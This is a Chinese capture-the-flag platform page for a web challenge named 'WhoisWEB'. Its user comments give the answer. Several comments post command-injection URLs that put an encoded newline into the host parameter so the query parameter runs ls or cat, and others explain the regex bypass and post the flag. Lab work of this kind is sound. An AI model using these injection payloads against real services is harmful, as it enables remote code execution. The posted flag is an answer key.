WhoisWEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 385
提  示: There was a problem with the first version, this is the fixed version.
描  述:
A web-based Whois service
评论
to5ny 7天前

/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

xzs297995 1月前

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

回复 0

xiaoxiao972521 1月前

/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0

15614005380 3月前

1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕

回复 0

unknown237819 3月前

在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令

回复 2

868954104 4月前

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 1

vchopin 5月前

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

回复 0

yituoshi 6月前

Half the truth is often a big lie: thisistheflagwithrandomstuffthatyouwontguessJUSTCATSHE

回复 0

1959272171 6月前

空格被过滤了 用%20绕过

回复 0

justsosoloveyou 7月前

抓包,发现/query.php能看源码,是RCE。 有正则过滤,用换行符的编码%0a来截断第一个参数即可。用第二个参数执行任意命令, ls查看文件列表,cat查看文件内容。

回复 4
宇宙无敌靓仔 5月前

playload 怎么构造呢

回复 0

qingfeng1115 5月前

flag 文件名字是什么

回复 0

WriteUp

image
hopeinhand

1 金币

评分(0)

暂无评分

解题动态

小白小白 攻破了该题 17小时前
17740656892 攻破了该题 1天前
18993258097 攻破了该题 1天前
xiuliyeer1 攻破了该题 1天前
绝情且小帅 攻破了该题 1天前
hjl123 攻破了该题 3天前
zhanghaosph 攻破了该题 3天前
银海狼鲨 攻破了该题 3天前
tartaglia 攻破了该题 4天前
huanying1247 攻破了该题 7天前
to5ny 攻破了该题 7天前
15346899030 攻破了该题 7天前
Panda82 攻破了该题 7天前
wobushicxk 攻破了该题 8天前
leafBugKu 攻破了该题 8天前
15267151599 攻破了该题 8天前
18894292492 攻破了该题 9天前
WCRH 攻破了该题 9天前
jquery 攻破了该题 10天前
WYEJOJO 攻破了该题 10天前